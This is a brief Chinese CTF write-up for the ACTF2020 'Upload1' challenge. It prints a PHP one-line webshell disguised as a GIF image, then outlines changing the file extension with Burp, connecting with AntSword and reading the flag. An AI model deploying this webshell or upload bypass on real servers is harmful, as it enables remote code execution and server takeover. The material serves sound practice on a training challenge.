1、点开题目链接,页面显示如下,上传test.jpg里面包含一句话木马
GIF89a? <script language="php">eval($_REQUEST[1])</script>
2、使用bp抓包修改后缀,点击发送
3、不关浏览器的代理,在bp中将该包放行
4、用蚁剑连接
5、在根目录中找到flag
[ACTF2020 新生赛]Upload1
不拿flag不改名2024-09-12 13:20
相关推荐
亓才孓几秒前
[JDBC]元数据独行soc12 分钟前
2026年渗透测试面试题总结-17(题目+回答)金融RPA机器人丨实在智能20 分钟前
Android Studio开发App项目进入AI深水区:实在智能Agent引领无代码交互革命科技块儿21 分钟前
利用IP查询在智慧城市交通信号系统中的应用探索独行soc1 小时前
2026年渗透测试面试题总结-18(题目+回答)王码码20351 小时前
Flutter for OpenHarmony 实战之基础组件:第二十七篇 BottomSheet — 动态底部弹窗与底部栏菜单2501_915106321 小时前
app 上架过程,安装包准备、证书与描述文件管理、安装测试、上传vistaup2 小时前
OKHTTP 默认构建包含 android 4.4 的TLS 1.2 以及设备时间不对兼容常利兵2 小时前
ButterKnife在Android 35 + Gradle 8.+环境下的适配困境与现代化迁移指南撩得Android一次心动2 小时前
Android LiveData 全面解析:使用Java构建响应式UI【源码篇】